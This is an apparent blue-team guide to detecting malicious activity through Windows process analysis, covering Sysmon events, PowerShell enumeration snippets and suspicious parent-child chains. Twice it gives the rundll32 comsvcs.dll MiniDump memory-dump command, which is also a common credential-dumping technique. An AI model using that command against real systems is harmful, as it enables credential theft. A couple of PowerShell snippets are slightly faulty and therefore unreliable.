Understanding the Concept of Runbooks
Windows Processes: Blue Team Guide for Detection and Analysis
Windows processes are at the heart of everything the operating system does — from system services to user applications. For defenders, analyzing processes is one of the fastest ways to spot anomalies, detect intrusions, and understand attacker activity.
Understanding Windows Processes
A process is an instance of a running program that contains code, data, handles, and allocated system resources. Each process has a PID (Process ID), a parent process, and a security context (user account).
Why Blue Teams Care
- Persistence detection - Attackers often hide backdoors inside legitimate processes.
- Lateral movement - Malicious tools may run under
svchost.exe
orexplorer.exe
to blend in. - Privilege escalation - Suspicious child processes of SYSTEM-owned services can indicate a breach.
Key Tools for Process Analysis on Windows
Task Manager
- Quick view of running processes (
Ctrl + Shift + Esc
). - Useful for initial triage but limited detail.
Process Explorer (Sysinternals)
procexp.exe
- Shows full parent-child relationships.
- Can verify process signatures.
- Flags processes with no valid company name or unsigned binaries.
Command-Line Tools
List processes:
Get-Process
tasklist /v
Detailed process info:
Get-WmiObject Win32_Process | Select-Object ProcessId,ParentProcessId,Name,CommandLine
Show tree view:
Get-Process | Sort-Object -Property Id | Format-Table Id, ProcessName, Path, StartTime
Common Attacker Behaviors to Watch
Process Injection
- Legitimate process running malicious code in memory.
- Example:
rundll32.exe
with a suspicious DLL path.
Detection:
Get-Process | Where-Object { $_.Modules.FileName -like "*Temp*" }
or use Sysmon Event ID 7 (image loaded).
Parent-Child Mismatch
- Example:
powershell.exe
spawned bywinword.exe
. - Common in phishing payloads.
Detection with Sysmon:
- Event ID 1 (process creation)
- Look for:
ParentImage: winword.exe
Image: powershell.exe
Suspicious Command Lines
- Long Base64-encoded strings in PowerShell.
- Unusual flags for
cmd.exe
.
Check recent PowerShell activity:
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object { $_.Message -match "-enc" }
Real-World Examples
Example 1: Malicious Word Macro
- User opens a malicious
.docx
. - Word spawns
powershell.exe
with an encoded payload. - Defender sees this chain in Sysmon logs and stops it before C2 connection.
Example 2: Persistence in svchost.exe
- Attacker installs a malicious service.
- Service runs as
svchost.exe
but from a non-standard path. - Process Explorer reveals the binary is unsigned and located in
%APPDATA%
.
Advanced Tools for Blue Teams
- Sysinternals Process Monitor (Procmon) - Detailed file/registry/network activity.
- Sysmon - Persistent logging of process creation, image loading, and network connections.
- Velociraptor - Endpoint visibility for threat hunting.
- Windows Event Viewer - Logs in
Security
andSysmon
channels.
Command & Script Cheat Sheet
List processes with network connections:
Get-NetTCPConnection | ForEach-Object {
$proc = Get-Process -Id $_.OwningProcess
[PSCustomObject]@{
ProcessName = $proc.ProcessName
PID = $_.OwningProcess
RemoteIP = $_.RemoteAddress
RemotePort = $_.RemotePort
}
}
Find unsigned binaries:
Get-Process | Where-Object {
-not (Get-AuthenticodeSignature $_.Path).Status -eq 'Valid'
}
Dump suspicious process memory (live forensics):
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\dump.dmp full
Pro Tips for Deeper Analysis
- Always correlate process creation with command line arguments.
- Check creation timestamps — a burst of processes at odd hours is a red flag.
- Match PIDs with network connections to find hidden RATs.
- Baseline normal processes for each host and compare regularly.
- Use ELK, Splunk, or Sentinel to hunt process anomalies across the enterprise.
Windows Process Hunting Cheat Sheet
Basic Process Enumeration
tasklist /v # List processes with details
Get-Process # PowerShell equivalent
Get-WmiObject Win32_Process # Full process info (PID, parent, path)
Detect Suspicious Parent-Child Chains
Get-WmiObject Win32_Process |
Select-Object ProcessId,ParentProcessId,Name,CommandLine |
Sort-Object ParentProcessId
Red Flags
winword.exe
→powershell.exe
explorer.exe
spawningcmd.exe
ormshta.exe
Find Encoded PowerShell Commands
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" |
Where-Object { $_.Message -match "-enc" }
Check Binary Signatures
Get-Process | Where-Object {
(Get-AuthenticodeSignature $_.Path).Status -ne 'Valid'
}
List Processes with Network Connections
Get-NetTCPConnection | ForEach-Object {
$proc = Get-Process -Id $_.OwningProcess
[PSCustomObject]@{
ProcessName = $proc.ProcessName
PID = $_.OwningProcess
RemoteIP = $_.RemoteAddress
RemotePort = $_.RemotePort
}
}
Detect Process Injection
Use Sysmon Event ID 7 (Image Loaded) to spot DLLs in unexpected locations:
%TEMP%
%APPDATA%
- Non-Windows directories
Dump Suspicious Process Memory
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> C:\dump.dmp full
(For offline analysis in tools like Volatility.)
Hunting Mindset
- Baseline first — know what's normal for the system.
- Look for spikes in process creation during off-hours.
- Correlate process events with network, registry, and file changes.
- Use Sysmon for rich telemetry: Event IDs 1 (process create), 7 (image load), 10 (process access).